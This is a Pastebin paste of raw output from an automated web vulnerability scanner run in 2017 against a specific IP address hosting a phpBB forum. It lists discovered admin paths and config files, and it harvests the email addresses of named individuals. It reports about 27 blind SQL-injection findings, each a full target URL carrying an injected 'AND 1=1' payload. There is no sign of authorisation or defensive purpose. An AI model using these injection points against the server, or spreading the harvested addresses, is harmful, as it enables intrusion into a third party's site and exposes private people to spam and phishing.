Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Scan date: 12-4-2017 22:3:38
- ===================================================================================================
- | Domain: http://208.94.243.114/
- | Server: Apache/2.4.6 (CentOS) PHP/5.4.16
- | IP: 208.94.243.114
- ===================================================================================================
- |
- | Directory check:
- | [+] CODE: 200 URL: http://208.94.243.114/adm/
- | [+] CODE: 200 URL: http://208.94.243.114/icons/
- ===================================================================================================
- |
- | File check:
- | [+] CODE: 200 URL: http://208.94.243.114/config.php
- | [+] CODE: 200 URL: http://208.94.243.114/faq.php
- | [+] CODE: 200 URL: http://208.94.243.114/index.php
- | [+] CODE: 200 URL: http://208.94.243.114/search.php
- | [+] CODE: 200 URL: http://208.94.243.114/web.config
- ===================================================================================================
- |
- | Check robots.txt:
- |
- | Check sitemap.xml:
- ===================================================================================================
- |
- | Crawler Started:
- | Plugin name: Code Disclosure v.1.1 Loaded.
- | Plugin name: phpinfo() Disclosure v.1 Loaded.
- | Plugin name: Upload Form Detect v.1.1 Loaded.
- | Plugin name: External Host Detect v.1.2 Loaded.
- | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
- | Plugin name: FCKeditor upload test v.1 Loaded.
- | Plugin name: E-mail Detection v.1.1 Loaded.
- | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
- | [+] Crawling finished, 616 URL's found!
- |
- | Source Code Disclosure:
- |
- | PHPinfo() Disclosure:
- |
- | File Upload Forms:
- |
- | External hosts:
- | [+] External Host Found: https://www.phpbb.com
- | [+] External Host Found: http://www.google.com
- | [+] External Host Found: https://i.gyazo.com
- | [+] External Host Found: http://httpd.apache.org
- | [+] External Host Found: https://youtu.be
- | [+] External Host Found: https://www.paypal.me
- | [+] External Host Found: http://mxsimulator.com
- | [+] External Host Found: https://docs.google.com
- | [+] External Host Found: http://forum.mxsimulator.com
- |
- | Timthumb:
- |
- | FCKeditor File Upload:
- |
- | E-mails:
- | [+] E-mail Found: mike@hyperreal.org
- | [+] E-mail Found: michael@racefactorygaming.com
- | [+] E-mail Found: kevinh@kevcom.com
- | [+] E-mail Found: claasicdesigns@gmail.com
- | [+] E-mail Found: jbmxer99@gmail.com
- | [+] E-mail Found: tjbmxer99@yahoo.com
- | [+] E-mail Found: humbedooh@apache.org
- | [+] E-mail Found: jlv@mxsimulator.com
- | [+] E-mail Found: chris@racefactorygaming.com
- |
- | Web Backdoors:
- |
- | Ignored Files:
- | http://208.94.243.114/adm/assets/javascript/jquery.min.js?assets_version=3
- | http://208.94.243.114/adm/styles/prosilver/template/ajax.js?assets_version=3
- | http://208.94.243.114/adm/.styles/prosilver/template/forum_fn.js?assets_version=3
- | http://208.94.243.114/adm/.styles/prosilver/theme/stylesheet.css?assets_version=3
- | http://208.94.243.114/assets/javascript/jquery.min.js?assets_version=3
- | http://208.94.243.114/styles/nofrills/theme/stylesheet.css?assets_version=3
- | http://208.94.243.114/adm/styles/prosilver/theme/responsive.css?assets_version=3
- | http://208.94.243.114/styles/prosilver/theme/en/stylesheet.css?assets_version=3
- | http://208.94.243.114/styles/prosilver/theme/stylesheet.css?assets_version=3
- | http://208.94.243.114/adm/.styles/nofrills/theme/stylesheet.css?assets_version=3
- | http://208.94.243.114/styles/prosilver/template/forum_fn.js?assets_version=3
- | http://208.94.243.114/styles/nofrills/theme/tweaks.css?assets_version=3
- | http://208.94.243.114/styles/prosilver/template/ajax.js?assets_version=3
- | http://208.94.243.114/adm/styles/prosilver/theme/en/stylesheet.css?assets_version=3
- | http://208.94.243.114/styles/prosilver/theme/responsive.css?assets_version=3
- | http://208.94.243.114/assets/javascript/core.js?assets_version=3
- | http://208.94.243.114/adm/styles/nofrills/theme/stylesheet.css?assets_version=3
- | http://208.94.243.114/adm/styles/nofrills/theme/tweaks.css?assets_version=3
- | http://208.94.243.114/adm/.styles/prosilver/theme/responsive.css?assets_version=3
- | http://208.94.243.114/adm/.styles/nofrills/theme/tweaks.css?assets_version=3
- | http://208.94.243.114/adm/.assets/javascript/core.js?assets_version=3
- | http://208.94.243.114/adm/.styles/prosilver/theme/en/stylesheet.css?assets_version=3
- | http://208.94.243.114/adm/styles/prosilver/theme/stylesheet.css?assets_version=3
- | http://208.94.243.114/adm/assets/javascript/core.js?assets_version=3
- | http://208.94.243.114/adm/.styles/prosilver/template/ajax.js?assets_version=3
- | http://208.94.243.114/adm/.assets/javascript/jquery.min.js?assets_version=3
- | http://208.94.243.114/adm/styles/prosilver/template/forum_fn.js?assets_version=3
- ===================================================================================================
- | Dynamic tests:
- | Plugin name: Learning New Directories v.1.2 Loaded.
- | Plugin name: FCKedior tests v.1.1 Loaded.
- | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
- | Plugin name: Find Backup Files v.1.2 Loaded.
- | Plugin name: Blind SQL-injection tests v.1.3 Loaded.
- | Plugin name: Local File Include tests v.1.1 Loaded.
- | Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
- | Plugin name: Remote Command Execution tests v.1.1 Loaded.
- | Plugin name: Remote File Include tests v.1.2 Loaded.
- | Plugin name: SQL-injection tests v.1.2 Loaded.
- | Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
- | Plugin name: Web Shell Finder v.1.3 Loaded.
- | [+] 2 New directories added
- |
- |
- | FCKeditor tests:
- |
- |
- | Timthumb < 1.33 vulnerability:
- |
- |
- | Backup Files:
- |
- |
- | Blind SQL Injection:
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewforum.php?sid=bbd0d2a0a0957a0bbf54d532db9fa735&f=2'+AND+'1'='1
- | [+] Keyword: registered
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewforum.php?sid=bbd0d2a0a0957a0bbf54d532db9fa735&f=16'+AND+'1'='1
- | [+] Keyword: registered
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/search.php?sid=1f3f5ae3d172f75e376fd5c36af8582d&search_id=active_topics'+AND+'1'='1
- | [+] Keyword: matches
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewforum.php?sid=8cc8c7ac1c34471c1810e7c9d2710511&f=18'+AND+'1'='1
- | [+] Keyword: registered
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/search.php?st=0&sd=d&sr=topics&sid=bbd0d2a0a0957a0bbf54d532db9fa735&search_id=unanswered&start=150&sk=t+AND+1=1
- | [+] Keyword: Stream
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/search.php?st=0&sk=t&sr=topics&sid=bbd0d2a0a0957a0bbf54d532db9fa735&search_id=unanswered&start=100&sd=d+AND+1=1
- | [+] Keyword: looking
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?t=44618&sid=bbd0d2a0a0957a0bbf54d532db9fa735&start=15&f=1'+AND+'1'='1
- | [+] Keyword: registered
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?t=44791&sid=cd7d4db4c791c38fa9b4f38d01896aaa&f=2'+AND+'1'='1
- | [+] Keyword: registered
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?f=15&sid=cd7d4db4c791c38fa9b4f38d01896aaa&t=44805'+AND+'1'='1
- | [+] Keyword: registered
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?f=6&t=44781&sid=cd7d4db4c791c38fa9b4f38d01896aaa'+AND+'1'='1
- | [+] Keyword: registered
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/index.php?sid=e2b85a78f29e9f444067f73b38c088d3'+AND+'1'='1
- | [+] Keyword: guests
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/index.php?sid=447a43fcba19fbc64076a4c14cb3fe47+AND+1=1
- | [+] Keyword: guests
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=1&t=44841&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=7&t=44840&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=18&t=44837&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=17&t=44839&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=44826&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=44825&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=18&t=44820&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=15&t=44805&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=2&t=44791&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=7&t=44774&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=44781&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=18&t=44778&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=25&t=44842&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=40401&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=19&t=43462&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
- | [+] Keyword: topics
- |
- |
- | Local File Include:
- |
- |
- | PHP CGI Argument Injection:
- |
- |
- | Remote Command Execution:
- |
- |
- | Remote File Include:
- |
- |
- | SQL Injection:
- |
- |
- | Cross-Site Scripting (XSS):
- |
- |
- | Web Shell Finder:
- ===================================================================================================
- | Static tests:
- | Plugin name: Local File Include tests v.1.1 Loaded.
- | Plugin name: Remote Command Execution tests v.1.1 Loaded.
- | Plugin name: Remote File Include tests v.1.1 Loaded.
- |
- |
- | Local File Include:
- |
- |
- | Remote Command Execution:
- |
- |
- | Remote File Include:
- ===================================================================================================
- Scan end date: 13-4-2017 1:39:31
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement